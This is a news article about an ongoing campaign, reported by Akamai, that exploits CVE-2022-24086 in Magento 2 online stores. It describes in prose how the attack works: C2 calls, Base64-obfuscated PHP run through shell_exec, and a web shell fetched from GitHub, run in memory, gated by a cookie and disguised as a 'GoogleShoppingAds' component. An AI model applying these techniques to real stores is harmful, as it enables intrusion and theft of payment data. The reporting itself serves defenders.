Magento shopping cart attack targets critical vulnerability revealed in early 2022

Ecommerce stores using Adobe's open source Magento 2 software are being targeted by an ongoing exploitation campaign based on a critical vulnerability that was patched last year, on February 13, 2022.

Security researchers at Akamai say they have identified a server-side template injection campaign aimed at Magneto 2 shops that have yet to address CVE-2022-24086, an input validation flaw with a CVSS score of 9.8.

"Unfortunately, businesses find it difficult to properly identify all their assets and patch in a timely manner," said Maxim Zavodchik, director of threat research at Akamai, in an email to The Register.

Businesses find it difficult to properly identify all their assets and patch in a timely manner

"Although zero-days and newly disclosed CVEs present a large opportunity for attackers, older CVEs are still being exploited by threat actors to get initial access to sites and networks."

The campaign, as explained in a blog post by Zavodchik and Akamai colleagues Ron Mankivsky, Dennis German, Chen Doytshman, and Tricia Howard, has been underway since at least January 2023.

"The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days," they said.

This isn't entirely unsurprising. At least seven threat groups have focused on attacking Magento shops since 2015, according to the security researchers. These groups, referred to collectively as Magecart due to their focus on Magento shopping carts, rely on various malware techniques like JavaScript data skimming, to intercept and steal transaction data from ecommerce websites.

The latest campaign, which Akamai has dubbed "Xurum" because that was the name of the attacker's command-and-control server until Akamai's post on the subject evidently prompted a name change.

Zavodchik said Akamai does not have insight into the number of affected or vulnerable Magento stores. "We are inspecting and blocking incoming attacks targeted at our customers, but our [Web Application Firewall] does not collect information about the customers' Magento version."

• Ecommerce platforms (cough, Magento) need patching before Black Friday, warns UK's National Cyber Security Centre
• Obscure internet boutique Amazon sues EU for calling it a Very Large Online Platform
• Amazon Prime too easy to join, too hard to quit, says FTC lawsuit
• Shopify sees $1.5B loss turn into $68M profit, celebrates by firing 20% of staff

The attackers attempted to serve two different payloads from four IP addresses, three associated with service provider Hetzner in Germany and one associated with Shock Hosting in the United States.

"The first variant executes the file_get_contents PHP function to send a request to the attacker’s C2 server xurum.com to determine whether the server is vulnerable to CVE-2022-24086 while the Base64 blob decodes to https://xurum.com/mo," the researchers explain.

The second variant delivers malicious PHP code, obfuscated using Base64 encoding and executed using the shell_exec PHP function, from the xurum server.

The xurum server, when it was operating, was physically located in the Netherlands and operated by Russian hosting biz VDSina.ru. When Akamai checked the server via VirusTotal, it was not rated malicious.

The researchers observed that instead of running the web shell on an attacker-controlled server, the code fetches a web shell from GitHub and, rather than writing it to disk, runs it in memory when the newly created "registration.php" page is accessed.

"The CVE enables arbitrary code execution on the target server," explained Zavodchik. "Attackers use this to pull the web shell from Github and execute it on the victim. The attackers are making a request with the exploit to the vulnerable server, then the exploit is making a request to Github to fetch the web shell and execute it."

The attackers try to prevent unauthorized use of the web shell by requiring the presence of a specific "magemojo000" cookie in the web request as an execution condition. They also use CSS to hide the login page for the web shell off-screen.

To prevent the malicious component from being detected, the attacker code registers the web shell as a new Magento component called "GoogleShoppingAds."

"This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure, as businesses struggle to keep up with patches and security measures," the researchers conclude. ®